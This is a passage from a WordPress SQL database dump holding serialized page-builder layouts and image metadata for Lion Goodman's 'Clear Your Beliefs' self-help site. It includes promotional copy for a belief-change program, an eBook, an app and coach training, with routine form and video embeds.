src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1159, 1646, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1482:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: 10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul style="margin-left: 18px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2822:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1087, 1577, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:445:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p style="margin-left: 255px; margin-bottom: 0px;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="4"]Button text[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(925, 1456, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:4:"Test";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:3:{s:5:"title";s:0:"";s:4:"text";s:4:"Test";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:3:{s:5:"title";s:0:"";s:4:"text";s:4:"Test";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"2";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:15:"Video Goes Here";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:17:"Content goes here";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:3:{i:0;a:1:{s:5:"cells";s:1:"3";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:5:{i:0;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"0";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"0";}i:3;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}}}'),
(926, 1457, '_wp_attached_file', '2014/10/header.jpg'),
(927, 1457, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:961;s:6:"height";i:232;s:4:"file";s:18:"2014/10/header.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"header-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:17:"header-300x72.jpg";s:5:"width";i:300;s:6:"height";i:72;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:18:"header-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:18:"header-400x232.jpg";s:5:"width";i:400;s:6:"height";i:232;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:18:"header-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:18:"header-672x232.jpg";s:5:"width";i:672;s:6:"height";i:232;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(928, 1458, 'panels_data', 'a:3:{s:7:"widgets";a:6:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:4:"Test";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:3:{s:5:"title";s:0:"";s:4:"text";s:4:"Test";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:3:{s:5:"title";s:0:"";s:4:"text";s:4:"Test";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:15:"Video Goes Here";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:17:"Content goes here";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:6:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}}}'),
(929, 1457, '_edit_lock', '1412661296:2'),
(931, 1460, 'panels_data', 'a:3:{s:7:"widgets";a:6:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" 